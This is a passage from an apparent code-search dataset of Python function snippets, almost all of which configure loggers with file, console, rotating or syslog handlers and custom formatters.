module_console_handler.setFormatter(formatter)\n\n logmoduleconsole.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logmoduleconsole.log(5, 'Exceedingly verbose debug')\n\n return logmoduleconsole", "def setLog(path):\n logger = logging.getLogger('current function')\n FORMAT = '%(asctime)s - %(levelname)s - %(message)s'\n logging.basicConfig( level = logging.DEBUG,\n format = FORMAT,\n filename = path,\n filemode = 'wa' )\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(FORMAT)\n console.setFormatter(formatter)\n logger.addHandler(console)\n return logger", "def setup_logger(name, log_file, level=logging.DEBUG):\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def open_log(self, log_name='autotest'):\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(self.console_handler)\n\n self.__logtofile(log_name)\n\n return logger", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def setup_logger(log_file_path =\"\"):\n formatter = ColoredFormatter(\n \"%(log_color)s%(levelname)-8s%(reset)s %(blue)s%(message)s\",\n datefmt=None,\n reset=True,\n log_colors={\n 'DEBUG': 'cyan',\n 'INFO': 'green',\n 'WARNING': 'yellow',\n 'ERROR': 'red',\n 'CRITICAL': 'purple',\n }\n )\n logging.basicConfig(handlers=[logging.FileHandler(log_file_path, 'w', 'utf-8')],\n format=\"%(message)s\"\n )\n logger = logging.getLogger('')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n logger.setLevel(logging.DEBUG)\n\n return logger", "def create_logger(logger_type=1, filename=\"./DMRender.log\",\n console_loglevel=\"INFO\", file_loglevel=\"DEBUG\"):\n if logger_type == 0:\n logger = logging.getLogger('DMlog')\n NullHandler = logging.NullHandler()\n logger.addHandler(NullHandler)\n\n else:\n try:\n numeric_file_loglevel = getattr(logging, file_loglevel.upper())\n numeric_console_loglevel = getattr(\n logging, console_loglevel.upper())\n except AttributeError as e:\n print(\"LoggingError: Invalid logLevel -> {}\".format(e))\n sys.exit(1)\n\n logger = logging.getLogger('DMlog')\n logger.setLevel(logging.DEBUG)\n\n # create console handler which logs to stdout\n if logger_type in [1, 3]:\n consoleLogger = logging.StreamHandler(stream=sys.stdout)\n consoleLogger.setLevel(numeric_console_loglevel)\n if sys.version_info[0] >= 3:\n consoleFormatter = logging.Formatter(\"{name:<5} - {levelname} \\\n - {message}\", style='{')\n else:\n consoleFormatter = logging.Formatter(\"%(name)-5s - \\\n %(levelname)s - %(message)s\")\n consoleLogger.setFormatter(consoleFormatter)\n logger.addHandler(consoleLogger)\n\n # create file handler which logs to a file\n if logger_type in [2, 3]:\n fileLogger = logging.FileHandler(filename, mode='w')\n fileLogger.setLevel(numeric_file_loglevel)\n if sys.version_info[0] >= 3:\n fileFormatter = logging.Formatter(\"{asctime}|{name:<5}|\\\n {levelname:^9} - {message}\", datefmt='%H:%M:%S', style='{')\n else:\n fileFormatter = logging.Formatter(\"%(asctime)s|%(name)-5s|\\\n %(levelname)-9s - %(message)s\", datefmt='%H:%M:%S')\n fileLogger.setFormatter(fileFormatter)\n logger.addHandler(fileLogger)\n\n # Silence the matplotlib logger\n mpl_logger = logging.getLogger(\"matplotlib\")\n mpl_logger.setLevel(logging.WARNING)\n\n return logger", "def file_logger(filename):\n handler = logging.FileHandler(filename)\n formatter = logging.Formatter()\n handler.setFormatter(formatter)\n log = logging.getLogger(filename)\n log.addHandler(handler)\n log.setLevel(logging.DEBUG)\n return log, handler", "def _instanciate_logger(self):\n\t\tself._logger = logging.getLogger('main')\n\t\tself._logger.setLevel(logging.DEBUG)\n\t\tself._logger.addHandler(logging.StreamHandler())", "def getLogger(\n verbose: int = 0,\n filename: Optional[str] = None,\n name: str = \"ttslearn\",\n add_stream_handler: bool = True,\n) -> Logger:\n global _initialized\n logger = logging.getLogger(name)\n if verbose >= 10:\n logger.setLevel(logging.DEBUG)\n elif verbose > 0:\n logger.setLevel(logging.INFO)\n else:\n logger.setLevel(logging.WARN)\n\n if _initialized.get(name, False):\n return logger\n else:\n _initialized[name] = True\n\n if add_stream_handler:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(logging.Formatter(format))\n logger.addHandler(stream_handler)\n\n if filename is not None:\n Path(filename).parent.mkdir(parents=True, exist_ok=True)\n file_handler = logging.FileHandler(filename=filename)\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter(format))\n logger.addHandler(file_handler)\n\n return logger", "def setup_logger(filename):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(filename)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n\n mac_addr = hex(uuid.getnode()).replace('0x', '')\n formatter = logging.Formatter(\n f'%(asctime)s - %(levelname)s - {mac_addr} - %(name)s: %(message)s')\n\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('Logger is created.')", "def make_logger(name=str(os.getpid())):\n if not sys.platform.startswith(\"win\") and sys.stderr.isatty():\n def add_color_emit_ansi(fn):\n \"\"\"Add methods we need to the class.\"\"\"\n def new(*args):\n \"\"\"Method overload.\"\"\"\n if len(args) == 2:\n new_args = (args[0], copy(args[1]))\n else:\n new_args = (args[0], copy(args[1]), args[2:])\n if hasattr(args[0], 'baseFilename'):\n return fn(*args)\n levelno = new_args[1].levelno\n if levelno >= 50:\n color = '\\x1b[31;5;7m\\n ' # blinking red with black\n elif levelno >= 40:\n color = '\\x1b[31m' # red\n elif levelno >= 30:\n color = '\\x1b[33m' # yellow\n elif levelno >= 20:\n color = '\\x1b[32m' # green\n elif levelno >= 10:\n color = '\\x1b[35m' # pink\n else:\n color = '\\x1b[0m' # normal\n try:\n new_args[1].msg = color + str(new_args[1].msg) + ' \\x1b[0m'\n except Exception as reason:\n print(reason) # Do not use log here.\n return fn(*new_args)\n return new\n log.StreamHandler.emit = add_color_emit_ansi(log.StreamHandler.emit)\n log_file = os.path.join(gettempdir(), str(name).lower().strip() + \".log\")\n log.basicConfig(level=-1, filemode=\"w\", filename=log_file)\n log.getLogger().addHandler(log.StreamHandler(sys.stderr))\n adrs = \"/dev/log\" if sys.platform.startswith(\"lin\") else \"/var/run/syslog\"\n try:\n handler = log.handlers.SysLogHandler(address=adrs)\n except:\n log.debug(\"Unix SysLog Server not found, ignored Logging to SysLog.\")\n else:\n log.getLogger().addHandler(handler)\n log.debug(\"Logger created with Log file at: {0}.\".format(log_file))\n return log", "def setup_logger(logger_filename, loglevel=\"INFO\", file_loglevel=\"INFO\", name='log'):\n \n # Setup the logger\n \n \n # instanciate the logger\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n # Filehandlier\n form_File = logging.Formatter('%(asctime)s - %(module)s - %(funcName)s - %(lineno)s - %(levelname)s - '\n '%(message)s')\n fh = logging.FileHandler(logger_filename)\n #fh.setLevel(logging.DEBUG)\n\n # If SAME, use the same loglevel as VERBOSE for file_loglevel\n if file_loglevel == \"SAME\":\n file_loglevel = loglevel\n\n if not file_loglevel in [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\", \"SAME\"]:\n logger.error(\"Error : wrong log level : \", loglevel)\n sys.exit(1)\n if file_loglevel == \"DEBUG\":\n fh.setLevel(logging.DEBUG)\n elif file_loglevel == \"INFO\":\n fh.setLevel(logging.INFO)\n elif file_loglevel == \"WARNING\":\n fh.setLevel(logging.WARNING)\n elif file_loglevel == \"ERROR\":\n fh.setLevel(logging.ERROR)\n else:\n logger.error(\"Error : wrong log level\")\n sys.exit(1)\n fh.setFormatter(form_File)\n\n # ConsoleHandler\n ch = logging.StreamHandler()\n form_Console = logging.Formatter('%(module)s - %(message)s')\n ch.setFormatter(form_Console)\n\n # Get the log level\n if not loglevel in [\"DEBUG\", \"INFO\", \"WARNING\", \"ERROR\"]:\n logger.error(\"Error : wrong log level : \", loglevel)\n sys.exit(1)\n if loglevel == \"DEBUG\":\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(form_File)\n elif loglevel == \"INFO\":\n ch.setLevel(logging.INFO)\n elif loglevel == \"WARNING\":\n ch.setLevel(logging.WARNING)\n elif loglevel == \"ERROR\":\n ch.setLevel(logging.ERROR)\n else:\n logger.error(\"Error : wrong log level\")\n sys.exit(1)\n\n # Add Handlers\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n return logger", "def loggerSetup(logLevel=logging.INFO):\n logger = logging.getLogger(__name__)\n outHandler = logging.StreamHandler(sys.stdout)\n outHandler.setFormatter(logging.Formatter(\"%(asctime)s:%(levelname)s:%(module)s: %(message)s\"))\n outHandler.setLevel(logLevel)\n logger.addHandler(outHandler)\n logger.setLevel(logLevel)\n return logger", "def create_logger():\r\n global logger\r\n logger = logging.getLogger(logger_name)\r\n\r\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s')\r\n \r\n handler = logging.StreamHandler()\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n \r\n return logger", "def setup_logger(logger_name, level=\"INFO\", log_file: str = None):\n assert level in LOG_LEVELS\n\n formatter = logging.Formatter('%(message)s')\n if log_file:\n handler = logging.FileHandler(log_file, mode=\"w\")\n else:\n handler = logging.StreamHandler(stdout)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(getattr(logging, level))\n logger.addHandler(handler)\n return logger", "def get_wrapping_logger(name=None, filename=None, file_size=5, debug=False):\n FORMAT = ('%(asctime)s.%(msecs)03dZ,[%(levelname)s],(%(threadName)-10s),'\n '%(module)s.%(funcName)s:%(lineno)d,%(message)s')\n log_formatter = logging.Formatter(fmt=FORMAT,\n datefmt='%Y-%m-%dT%H:%M:%S')\n log_formatter.converter = time.gmtime\n\n if name is None:\n name = get_caller_name()\n logger = logging.getLogger(name)\n\n if debug or logger.getEffectiveLevel() == logging.DEBUG:\n log_lvl = logging.DEBUG\n else:\n log_lvl = logging.INFO\n logger.setLevel(log_lvl)\n\n if filename is not None:\n # TODO: check file/path validity\n file_handler = RotatingFileHandler(filename=filename, mode='a', maxBytes=file_size * 1024 * 1024,\n backupCount=2, encoding=None, delay=0)\n file_handler.name = name + '_file_handler'\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(log_lvl)\n if not is_log_handler(logger, file_handler):\n logger.addHandler(file_handler)\n\n console_handler = logging.StreamHandler()\n console_handler.name = name + '_console_handler'\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(log_lvl)\n if not is_log_handler(logger, console_handler):\n logger.addHandler(console_handler)\n return logger", "def setupfilelogging(LogFileName):\n\n Logger = logging.getLogger(LoggerName)\n Logger.setLevel(logging.INFO)\n\n# Create a console log\n\n ConsoleLog = logging.StreamHandler()\n ConsoleLog.setLevel(logging.DEBUG)\n\n# Create a logging format and add to the logging streams\n\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n LogFormat = logging.Formatter('%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n ConsoleLog.setFormatter(LogFormat)\n\n# Add the console log stream to the logger\n\n Logger.addHandler(ConsoleLog)\n\n FileLog = logging.FileHandler(LogFileName)\n FileLog.setLevel(logging.DEBUG)\n FileLog.setFormatter(LogFormat)\n\n Logger.addHandler(FileLog)\n\n return Logger", "def setup_logger(log_file: str = DEFAULT_LOG_FILE, level: t.Optional[int] = None):\n # create logger with 'spam_application'\n logger = logging.getLogger()\n root_log_level = level if (level is not None) else logging.DEBUG\n logger.setLevel(root_log_level)\n # create file handler which logs even debug messages\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(root_log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def get_logger(name: str, log_path: str = os.path.join(os.path.dirname(__file__), \"main.log\"),\n console: bool = False) -> logging.Logger:\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n # ensure that logging handlers are not duplicated\n for handler in list(logger.handlers):\n logger.removeHandler(handler)\n\n # rotating file handler\n if log_path:\n fh = RotatingFileHandler(path_join(log_path),\n maxBytes=10 * 2 ** 20, # 10 MB\n backupCount=1) # 1 backup\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # console handler\n if console:\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n # null handler\n if not (log_path or console):\n logger.addHandler(logging.NullHandler())\n\n return logger", "def setup_custom_logger(filename):\n\n logger = logging.getLogger('root')\n logger.setLevel(logging.INFO)\n\n # set file output handler and formatter for that\n file_handler = logging.FileHandler(filename)\n file_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n\n # set console output handler and formatter\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(logging.Formatter('%(asctime)s - %(message)s'))\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n\n return logger", "def logger_initiate():\n logger.setLevel(logging.DEBUG)\n return logging.basicConfig(\n format=(\n '%(asctime)s.%(msecs)03d %(name)-12s %(levelname)-8s %(message)s'),\n datefmt='%Y-%m-%d %H:%M:%S')", "def get_console_logger(name=None):\n if name is None:\n name = os.path.splitext(os.path.basename(sys.argv[0]))[0]\n logger = logging.getLogger(name)\n\n # reset handlers\n logger.handlers = []\n sh = logging.StreamHandler()\n fmt = logging.Formatter(LOG_FMT)\n sh.setFormatter(fmt)\n logger.addHandler(sh)\n logger.setLevel(logging.INFO)\n\n return logger", "def __setup_logger(name, log_file, level=logging.WARNING, stream=True):\n log_format = logging.Formatter(\"%(asctime)s%(filename)s:%(lineno)-3d %(levelname)s %(message)s\")\n handler = logging.FileHandler(log_file)\n handler.setFormatter(log_format)\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n if stream is True:\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(log_format)\n logger.addHandler(stream_handler)\n return logger", "def get_main_logger():\n\n # Use verbose debug logging for now.\n console_loglevel = VERBOSITY_LEVELS[2]\n file_loglevel = VERBOSITY_LEVELS[2]\n\n console_fmt = logging.Formatter(\n '%(name)s: %(levelname)s %(message)s')\n file_fmt = logging.Formatter(\n '%(asctime)s - %(name)s: %(levelname)s %(message)s')\n\n log = logging.getLogger('toggledarkly')\n\n console_log = logging.StreamHandler()\n console_log.setFormatter(console_fmt)\n console_log.setLevel(console_loglevel)\n log.addHandler(console_log)\n\n file_log = handlers.RotatingFileHandler(\n LOG_FILE_PATH, maxBytes=(1048576*5), backupCount=5\n )\n file_log.setFormatter(file_fmt)\n file_log.setLevel(file_loglevel)\n log.addHandler(file_log)\n\n if SYSTEMD_SUPPORT:\n journald_log = JournalHandler()\n journald_log.setLevel(file_loglevel)\n journald_log.setFormatter(console_fmt)\n log.addHandler(journald_log)\n \n log.setLevel(VERBOSITY_LEVELS[2])\n\n return log", "def setup_logger(name, log_file, level=logging.INFO):\n\n handler = logging.FileHandler(log_file) \n handler.setFormatter(logging_formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger(config):\n filename = config[\"LOGGER_FILE\"]\n log_dir = '/'.join(filename.split('/')[0:-1]) + \"/\"\n\n check_and_create_directory(log_dir)\n\n level = config[\"LOGGER_LOGLEVEL\"].upper()\n filemode = 'a'\n _format = '%(asctime)s %(name)8s %(module)15s %(funcName)12s %(' \\\n 'levelname)7s: %(message)s'\n _dateformat = '(%d.%m.%Y, %H:%M:%S)'\n\n logging.basicConfig(filename=filename, filemode=filemode, level=level,\n format=_format, datefmt=_dateformat)\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"werkzeug\").setLevel(logging.WARNING)\n\n # Display log simultaneously on console\n if config[\"CONSOLE_LOGGING\"]:\n add_terminal_logging(_format, level)", "def create_logger(args, save_dir, fname=None):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.INFO)\n if fname is None:\n fname = 'stdout.log'\n hdlr = logging.FileHandler(os.path.join(save_dir, fname))\n hdlr.setLevel(logging.INFO)\n msg_format = '%(asctime)s [%(levelname)s] %(message)s'\n formatter = logging.Formatter(msg_format)\n ch.setFormatter(formatter)\n hdlr.setFormatter(formatter)\n root.addHandler(ch)\n root.addHandler(hdlr)\n logging.info(sys.version_info)\n logging.info(args)\n\n return logging", "def logger(name, debug=True):\n logging.basicConfig() # errors and everything else (2 separate log groups)\n log = logging.getLogger(name)\n log.setLevel(logging.INFO)\n if debug:\n log.setLevel(logging.DEBUG)\n return log", "def setup_logger(logger: logging.Logger, log_file_path: str) -> None:\n\n logger.setLevel(logging.DEBUG)\n\n # create handlers\n console_handler = logging.StreamHandler()\n file_handler = logging.FileHandler(log_file_path)\n\n # set levels of the handlers\n console_handler.setLevel(level=logging.DEBUG)\n file_handler.setLevel(level=logging.INFO)\n\n # create formats and set them to the handlers\n file_format = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s | %(message)s')\n\n console_handler.setFormatter(CustomFormatter())\n file_handler.setFormatter(file_format)\n\n # add handlers to the logger\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)", "def logger(self) -> logging.Logger:\n logging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s - %(name)-15s - [%(levelname)-10s] %(message)s\"\n )\n return logging.getLogger(os.path.basename(__file__))", "def setup_logger(name, log_file, level=logging.INFO):\n if name in ( \"\", None ):\n raise \"No name\"\n return\n\n if log_file in ( \"\", None ):\n raise \"No log_file\"\n return\n\n formatter = logging.Formatter(\n fmt = '%(asctime)s.%(msecs)03d %(levelname)s File: \"%(pathname)s\", line %(lineno)d, in %(module)s - %(funcName)s: %(message)s',\n datefmt= '%Y-%m-%d %H:%M:%S'\n )\n\n handler = logging.FileHandler(log_file)\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(level)\n logger.addHandler(handler)\n\n return logger", "def setup_logger():\n root = logging.getLogger()\n root.setLevel(LOGGING_LEVEL)\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(LOGGING_LEVEL)\n ch.setFormatter(formatter)\n root.addHandler(ch)", "def _create_logger(self, log_dir: str) -> logging.Logger:\n self.log_dir = log_dir\n self.log_file = os.path.join(log_dir, self.name)\n os.makedirs(self.log_dir, exist_ok=True)\n logger = logging.getLogger(self.log_file)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(self.log_file)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(filename)s:%(lineno)d %(message)s\",\n datefmt=\"%Y-%m-%d-%H:%M:%S\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger", "def logger(level, format='%(levelname)s %(message)s'):\n\n # Remove previous handlers\n root = logging.getLogger()\n if root.handlers:\n for handler in root.handlers:\n root.removeHandler(handler)\n\n # Create logger\n logger = logging.getLogger()\n logger.setLevel(getattr(logging, level.upper()))\n\n # Create console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(getattr(logging, level.upper()))\n\n # Create formatter\n formatter = Formatter(format)\n\n # Add formatter to ch\n ch.setFormatter(formatter)\n\n # Add console handler to logger\n logger.addHandler(ch)\n\n return logger", "def setLogger(options):\n loglevel = 'WARNING'\n if options.verbose:\n loglevel = logging.getLevelName(loglevel) - 10 * options.verbose\n if loglevel < 10:\n loglevel = 10\n\n logger = logging.getLogger('main')\n logger.setLevel(loglevel)\n formatter = logging.Formatter('%(asctime)s [%(levelname)s]: %(message)s')\n\n if options.logfile:\n file_logger = logging.FileHandler(options.logfile)\n else:\n file_logger = logging.StreamHandler()\n file_logger.setLevel(loglevel)\n file_logger.setFormatter(formatter)\n logger.addHandler(file_logger)\n\n return logger", "def setup_std_logging (logger, log_file, verbose):\n class debug_filter(logging.Filter):\n \"\"\"\n Ignore INFO messages\n \"\"\"\n def filter(self, record):\n return logging.INFO != record.levelno\n\n class NullHandler(logging.Handler):\n \"\"\"\n for when there is no logging \n \"\"\"\n def emit(self, record):\n pass\n\n # We are interesting in all messages\n logger.setLevel(logging.DEBUG)\n has_handler = False\n\n # log to file if that is specified\n if log_file:\n handler = logging.FileHandler(log_file, delay=False)\n handler.setFormatter(logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)6s - %(message)s\"))\n handler.setLevel(MESSAGE)\n logger.addHandler(handler)\n has_handler = True\n\n # log to stderr if verbose\n if verbose:\n stderrhandler = logging.StreamHandler(sys.stderr)\n stderrhandler.setFormatter(logging.Formatter(\" %(message)s\"))\n stderrhandler.setLevel(logging.DEBUG)\n if log_file:\n stderrhandler.addFilter(debug_filter())\n logger.addHandler(stderrhandler)\n has_handler = True\n\n # no logging\n if not has_handler:\n logger.addHandler(NullHandler())", "def create_logger():\n logger = logging.getLogger(\"punctuation_logger\")\n logger.setLevel(logging.INFO)\n #logger.setLevel(logging.NOTSET) # Set Logger's level to NOTSET, default is WARNING\n\n # create the logging file handler\n if options.log_file is not None:\n fh = logging.FileHandler(options.log_file)\n \n fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n formatter = logging.Formatter(fmt)\n fh.setFormatter(formatter)\n fh.setLevel(logging.NOTSET)\n # add handler to logger object\n logger.addHandler(fh)\n return logger", "def setup_logging():\n lvl = os.getenv(\"LOG_LEVEL\")\n path = os.getenv(\"LOG_PATH\")\n\n logger = get_logger()\n logger.setLevel(lvl)\n\n filehandler = logging.FileHandler(path)\n filehandler.setLevel(lvl)\n filehandler.setFormatter(logging.Formatter(\n \"[%(asctime)s] %(levelname)s: %(message)s\",\n datefmt=\"%Y-%d-%m %H:%M:%S\"\n ))\n\n streamhandler = logging.StreamHandler()\n streamhandler.setLevel(lvl)\n streamhandler.setFormatter(logging.Formatter(\"%(message)s\"))\n\n logger.addHandler(filehandler)\n logger.addHandler(streamhandler)", "def make_logger(model_dir: str, log_file: str = \"train.log\") -> Logger:\n logger = logging.getLogger(__name__)\n if not logger.handlers:\n logger.setLevel(level=logging.DEBUG)\n fh = logging.FileHandler(\"{}/{}\".format(model_dir, log_file))\n fh.setLevel(level=logging.DEBUG)\n logger.addHandler(fh)\n formatter = logging.Formatter(\"%(asctime)s %(message)s\")\n fh.setFormatter(formatter)\n if platform == \"linux\":\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(sh)\n logger.info(\"Hello! This is Joey-NMT.\")\n return logger", "def setup_logger(log_file_path, log_name, mode=\"a\"):\n logger = logging.getLogger(log_name)\n logger.setLevel(logging.INFO)\n\n fh = logging.FileHandler(log_file_path, mode=mode)\n fh.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"%(asctime)s - %(message)s\")\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n logger.propagate = False # prevent the child logger from propagating log to the root logger (twice), not necessary\n return logger", "def construct_logger(name, save_dir):\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n\n file_no_ext = out_file_core()\n\n fh = logging.FileHandler(os.path.join(save_dir, file_no_ext + \".txt\"), encoding=\"utf-8\")\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s %(name)s %(levelname)s: %(message)s\")\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n gitdiff_patch = os.path.join(save_dir, file_no_ext + \".gitdiff.patch\")\n os.system(f\"git diff HEAD > {gitdiff_patch}\")\n\n return logger", "def create_logger():\n global logger\n\n formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\n handler = TimedRotatingFileHandler(log_file, when=\"midnight\", interval=1)\n handler.setFormatter(formatter)\n handler.setLevel(log_level)\n handler.suffix = \"%Y-%m-%d\"\n logger = logging.getLogger(\"sacplus\")\n logger.setLevel(log_level)\n logger.addHandler(handler)", "def setup_logger(logLevel=\"DEBUG\"):\n logroot = logging.getLogger(\"c\")\n logroot.propagate = False\n logroot.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n # log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n log_format_module = \"%(name)s: %(message)s\"\n # log_format_module = \"%(message)s\"\n\n formatter = logging.Formatter(log_format_module)\n module_console_handler.setFormatter(formatter)\n\n logroot.addHandler(module_console_handler)\n\n logging.addLevelName(5, \"TRACE\")\n # use it like this\n # logroot.log(5, 'Exceedingly verbose debug')\n\n # example log line\n logg = logging.getLogger(f\"c.{__name__}.setup_logger\")\n logg.debug(f\"Done setting up logger\")", "def log_info():\n # Get an instance of a logger\n logging.basicConfig(level=logging.DEBUG)\n return logging.getLogger('general')", "def create_logger(log_dir=None):\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir)\n log_format = '%(asctime)s %(process)d [%(levelname)s] %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_format)\n logger = logging.getLogger('es_on_gke')\n if log_dir:\n log_file = os.path.join(log_dir, 'log.txt')\n file_hdl = logging.FileHandler(log_file)\n formatter = logging.Formatter(fmt=log_format)\n file_hdl.setFormatter(formatter)\n logger.addHandler(file_hdl)\n return logger", "def setup_applevel_logger(logger_name = APP_LOGGER_NAME, file_name=None):\n\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n logger.handlers.clear()\n logger.addHandler(stream_handler)\n if file_name:\n if not os.path.exists(\"logs\"):\n os.makedirs(\"logs\")\n file_handler = logging.FileHandler(f\"./logs/{file_name}\", encoding=\"utf-8\")\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n return logger", "def _setup_logger(self, level, log_file):\n level = getattr(logging, level.upper())\n logger.setLevel(level)\n formatter = logging.Formatter(\n '[%(levelname)s] %(asctime)s - %(module)s.%(funcName)s() - %(message)s')\n handler = logging.StreamHandler()\n logger.addHandler(handler)\n handler.setFormatter(formatter)\n if not log_file:\n return\n try:\n handler = TimedRotatingFileHandler(log_file)\n except IOError:\n logger.error(\"Could not write to %s, falling back to stdout\",\n log_file)\n else:\n logger.addHandler(handler)\n handler.setFormatter(formatter)", "def debug_logging(severity, message, output=\"file\"):\n now = datetime.now()\n\n if output == \"file\":\n logging.basicConfig(filename='/home/pi/Terrarium/terrariumweb.log', level=logging.INFO)\n logging.info((\"{0}: {1} - {2}\".format(now.strftime(\"%Y-%m-%d %I:%M:%S %p\"), severity, message)))\n else:\n 